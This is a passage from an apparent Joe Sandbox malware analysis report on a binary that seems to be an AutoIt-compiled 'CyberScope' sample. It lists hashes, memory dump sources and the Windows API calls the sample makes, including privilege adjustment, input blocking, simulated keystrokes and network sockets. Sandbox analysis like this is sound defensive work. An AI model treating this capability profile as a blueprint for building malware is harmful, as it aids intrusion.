                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                    • String ID: *.*
                                                                                    • API String ID: 1972594611-438819550
                                                                                    • Opcode ID: 9e1778c51ee7a96ca78b6659fb4ae47a4c3c30c28fce36ba83135ae91c1b5d20
                                                                                    • Instruction ID: 871ae24c00f4382e1185e4189cca2704e7ae2f3215858a176ecf18887dbe50e0
                                                                                    • Opcode Fuzzy Hash: 9e1778c51ee7a96ca78b6659fb4ae47a4c3c30c28fce36ba83135ae91c1b5d20
                                                                                    • Instruction Fuzzy Hash: 20416E7191130AAFCF14DFA4DD49AEEBBB8EF15310F644056E805A21E2EB319E94CF61
                                                                                    APIs
                                                                                      • Part of subcall function 00213AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00213AD7
                                                                                      • Part of subcall function 00213AAB: _wcslen.LIBCMT ref: 00213AF8
                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 002122BA
                                                                                    • WSAGetLastError.WSOCK32 ref: 002122E1
                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00212338
                                                                                    • WSAGetLastError.WSOCK32 ref: 00212343
                                                                                    • closesocket.WSOCK32(00000000), ref: 00212372
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                    • String ID:
                                                                                    • API String ID: 1601658205-0
                                                                                    • Opcode ID: a0b4e4ddd2412dd8b778b9ff4f4b2a4477ee544f7f4a0764f55efa7c16803bca
                                                                                    • Instruction ID: 630d67d1f1962e2db565d2baf226e657b7493bae7410408b2dd6762a1cc514e5
                                                                                    • Opcode Fuzzy Hash: a0b4e4ddd2412dd8b778b9ff4f4b2a4477ee544f7f4a0764f55efa7c16803bca
                                                                                    • Instruction Fuzzy Hash: E351B275A00200AFEB10EF64C886F6A77E5AF55718F048098F9559F3D3C774AD528BE1
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                    • String ID:
                                                                                    • API String ID: 292994002-0
                                                                                    • Opcode ID: 946cd6fbd344f68e4d8cc36110748ae678df10cb6e2b613a08d5c92d363a7a82
                                                                                    • Instruction ID: ebe1ed4613ea1a37f76cf3ed0a03168652da80cef8ff3b4dac229f6912718092
                                                                                    • Opcode Fuzzy Hash: 946cd6fbd344f68e4d8cc36110748ae678df10cb6e2b613a08d5c92d363a7a82
                                                                                    • Instruction Fuzzy Hash: E5212731714221FFD7209FA6E844B5ABBE9EF94310F588068E8498B251CB72EC56CB90
                                                                                    APIs
                                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 0020D8CE
                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0020D92F
                                                                                    • SetEvent.KERNEL32(?,?,00000000), ref: 0020D943
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorEventFileInternetLastRead
                                                                                    • String ID:
                                                                                    • API String ID: 234945975-0
                                                                                    • Opcode ID: 76602c651bd6047ef03ecc1c6dadc259fee567dd678aaf874065d5b33d2be7ed
                                                                                    • Instruction ID: dd377f40168ae31245bb67bde40d05f1e23e2d3f1e37545404e23a09c596e31c
                                                                                    • Opcode Fuzzy Hash: 76602c651bd6047ef03ecc1c6dadc259fee567dd678aaf874065d5b33d2be7ed
                                                                                    • Instruction Fuzzy Hash: 5F21AF7191170AEFE7309FA5D888BABB7FCEF40314F10441DE64692192E770EA16CB50
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(?,001D46AC), ref: 001FE482
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 001FE491
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 001FE4A2
                                                                                    • FindClose.KERNEL32(00000000), ref: 001FE4AE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 2695905019-0
                                                                                    • Opcode ID: 05ea511153ce8a1d9d474b5c3c9afe9cf4522d6e5567007cf767c1ebe9df9351
                                                                                    • Instruction ID: e18f1ed66b854ab1877b69b405bb22b10923614d5770f0d6c1e932d09ee1886c
                                                                                    • Opcode Fuzzy Hash: 05ea511153ce8a1d9d474b5c3c9afe9cf4522d6e5567007cf767c1ebe9df9351
                                                                                    • Instruction Fuzzy Hash: B9F0E530410914A7D62467BCBC0D8BB77ADAE12336B944709FD36C20F0D7789D968695
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: LocalTime
                                                                                    • String ID: %.3d$X64
                                                                                    • API String ID: 481472006-1077770165
                                                                                    • Opcode ID: d6ca46597b7ace1ca65a425790de2d011a13725f3f2467309f534cfc82de34d3
                                                                                    • Instruction ID: c535a6ae16fca5a294859084ade4ef4c17a35fcba5d08d5b0e63733fbc1e5e0c
                                                                                    • Opcode Fuzzy Hash: d6ca46597b7ace1ca65a425790de2d011a13725f3f2467309f534cfc82de34d3
                                                                                    • Instruction Fuzzy Hash: 1CD012B5C04548E6CBD897919C88DBD73FCBB2D301F224866F906E1000E73099089B25
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 001C2A8A
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 001C2A94
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 001C2AA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                    • String ID:
                                                                                    • API String ID: 3906539128-0
                                                                                    • Opcode ID: c359653a37dd78962e1235d85c2de55bd0763ef3e2ef1d8afbbb4a9ef2aecde1
                                                                                    • Instruction ID: 929fad786bf56eb42d0fecd91e9d3a67e44a39b7d5f49652f1db147a0cdf3483
                                                                                    • Opcode Fuzzy Hash: c359653a37dd78962e1235d85c2de55bd0763ef3e2ef1d8afbbb4a9ef2aecde1
                                                                                    • Instruction Fuzzy Hash: 8131A87590122CABCB21DF64DD89BDDBBB4AF18310F5041DAE81CA7261E7709F858F45
                                                                                    APIs
                                                                                      • Part of subcall function 001B014B: __CxxThrowException@8.LIBVCRUNTIME ref: 001B09D8
                                                                                      • Part of subcall function 001B014B: __CxxThrowException@8.LIBVCRUNTIME ref: 001B09F5
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001F205A
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001F2087
                                                                                    • GetLastError.KERNEL32 ref: 001F2097
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                    • String ID:
                                                                                    • API String ID: 577356006-0
                                                                                    • Opcode ID: edf9919ba7d320b6d890f4e431f53d33e1327b21ca63c689859c7c23a946ed77
                                                                                    • Instruction ID: ed39cfd220d4f85b6a87f852afa12dca8e24cb83dc556ae8e802e8642d29a3fc
                                                                                    • Opcode Fuzzy Hash: edf9919ba7d320b6d890f4e431f53d33e1327b21ca63c689859c7c23a946ed77
                                                                                    • Instruction Fuzzy Hash: E9118FB2414205BFD7289F54ECC6D6BB7B8EB48710B20851EF15657251DB70FC42CA64
                                                                                    APIs
                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 001EE664
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: NameUser
                                                                                    • String ID: X64
                                                                                    • API String ID: 2645101109-893830106
                                                                                    • Opcode ID: c138e51cc424b1d7b8702734278cf1807d03991ac92a4a51942d857a54e05a75
                                                                                    • Instruction ID: dc652ae5903fdf4263519810282764bfe699163530bcc2a8793eab35e7818677
                                                                                    • Opcode Fuzzy Hash: c138e51cc424b1d7b8702734278cf1807d03991ac92a4a51942d857a54e05a75
                                                                                    • Instruction Fuzzy Hash: 67D0C9F580111DEADF94CB90ECC8DDDB3BCBB08304F110651F106E2000D73096498B14
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,002152EE,?,?,00000035,?), ref: 00204229
                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,002152EE,?,?,00000035,?), ref: 00204239
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFormatLastMessage
                                                                                    • String ID:
                                                                                    • API String ID: 3479602957-0
                                                                                    • Opcode ID: a6a40d2b6be880b16ebd4313642d1bf149a8525ddcc3967cfde086eddd8cc66d
                                                                                    • Instruction ID: c766e8ee2f8613448c933e1407c68b8945251ce3709bc9f473a1010c95fb6608
                                                                                    • Opcode Fuzzy Hash: a6a40d2b6be880b16ebd4313642d1bf149a8525ddcc3967cfde086eddd8cc66d
                                                                                    • Instruction Fuzzy Hash: 40F0E5707103257AEB2066A5AC8DFEB366DEFC5761F100275FA05D22C2DA709A00C6B0
                                                                                    APIs
                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 001FBC24
                                                                                    • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 001FBC37
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: InputSendkeybd_event
                                                                                    • String ID:
                                                                                    • API String ID: 3536248340-0
                                                                                    • Opcode ID: 2ae872950690b940d6f7954dce76447aca6ce23ef33fdaa7919ef0ab28793ef4
                                                                                    • Instruction ID: df580bfdebbbd871b715b985d617f1e659c2f81ea98fa7308328bbed5ec4ea24
                                                                                    • Opcode Fuzzy Hash: 2ae872950690b940d6f7954dce76447aca6ce23ef33fdaa7919ef0ab28793ef4
                                                                                    • Instruction Fuzzy Hash: D8F06D7080424DABDB059FA0D809BBFBBB0FF04309F149009FA55A5191C7798211DF94
                                                                                    APIs
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001F1B48), ref: 001F1A20
                                                                                    • CloseHandle.KERNEL32(?,?,001F1B48), ref: 001F1A35
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                    • String ID:
                                                                                    • API String ID: 81990902-0
                                                                                    • Opcode ID: edb588f988698f9dd56e0d992f4c9519b3a8262e1236af7f3d0312f951ceaf7f
                                                                                    • Instruction ID: 59cb2018ff81d52486b711e8f0a29fe1dd9ff8c0c4a0e07274ddd596c49df602
                                                                                    • Opcode Fuzzy Hash: edb588f988698f9dd56e0d992f4c9519b3a8262e1236af7f3d0312f951ceaf7f
                                                                                    • Instruction Fuzzy Hash: 58E0BF72014610BFE7262B54FC09FB777A9EB04311F24891DF59585470DBB2AC91DB54
                                                                                    APIs
                                                                                    • BlockInput.USER32(00000001), ref: 0020F51A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: BlockInput
                                                                                    • String ID:
                                                                                    • API String ID: 3456056419-0
                                                                                    • Opcode ID: 01868a2e1224428a73cc14846fd6a77676a29c14ec207eb3de7a3cb05018faab
                                                                                    • Instruction ID: 4094f0fa486321e01a45bf4249e68901c804c50298c1b9d193757196307dd014
                                                                                    • Opcode Fuzzy Hash: 01868a2e1224428a73cc14846fd6a77676a29c14ec207eb3de7a3cb05018faab
                                                                                    • Instruction Fuzzy Hash: 47E048312502059FD760DF69E804D56FBDCBFA4761F008425F849C7352D770F9418B91
                                                                                    APIs
                                                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 001FEC95
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: mouse_event
                                                                                    • String ID:
                                                                                    • API String ID: 2434400541-0
                                                                                    • Opcode ID: 1f1b3dec3381b30fdc6337540163bfb902ee9d1ef1698f059b89529edc77e624
                                                                                    • Instruction ID: 4cec7da4660e1b9e3508d8e7ee32869502f4989ba4532c5c962aef9a3472a02b
                                                                                    • Opcode Fuzzy Hash: 1f1b3dec3381b30fdc6337540163bfb902ee9d1ef1698f059b89529edc77e624
                                                                                    • Instruction Fuzzy Hash: 63D05EB619020879E81C8E3C9F2FF360A89E302761F945349F302D55B5E7C19B089121
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,001B075E), ref: 001B0D4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: c40cf7a1ba27964a12a4a0d6d607cfc3960c67182e452cdc1d5ebedcb09fac5f
                                                                                    • Instruction ID: 9367b28bb975aba5942ed4c33c6450aea98cacbf717838375903bc16851868eb
                                                                                    • Opcode Fuzzy Hash: c40cf7a1ba27964a12a4a0d6d607cfc3960c67182e452cdc1d5ebedcb09fac5f
                                                                                    • Instruction Fuzzy Hash:
                                                                                    APIs
                                                                                    • DeleteObject.GDI32(00000000), ref: 0021358D
                                                                                    • DeleteObject.GDI32(00000000), ref: 002135A0
                                                                                    • DestroyWindow.USER32 ref: 002135AF
                                                                                    • GetDesktopWindow.USER32 ref: 002135CA
                                                                                    • GetWindowRect.USER32(00000000), ref: 002135D1
                                                                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00213700
                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 0021370E
                                                                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00213755
                                                                                    • GetClientRect.USER32(00000000,?), ref: 00213761
                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0021379D
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002137BF
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002137D2
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002137DD
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 002137E6
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002137F5
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 002137FE
                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00213805
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00213810
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00213822
                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00230C04,00000000), ref: 00213838
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00213848
                                                                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 0021386E
                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 0021388D
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002138AF
                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00213A9C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                    • API String ID: 2211948467-2373415609
                                                                                    • Opcode ID: 1c774161336bfc78b46f1453bd5aa409cebed87de4ea010017d17985654a5128
                                                                                    • Instruction ID: b3c66bb005de31c4d664cb31f1ce9b52d7c6c4827e0103040b8fd848619b3e0f
                                                                                    • Opcode Fuzzy Hash: 1c774161336bfc78b46f1453bd5aa409cebed87de4ea010017d17985654a5128
                                                                                    • Instruction Fuzzy Hash: 4C027B71910215FFDB24DFA4DD8DEAE7BBAEB48310F108158F915AB2A0CB74AD51CB60
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(?,?), ref: 001916B4
                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 001D2B07
                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 001D2B40
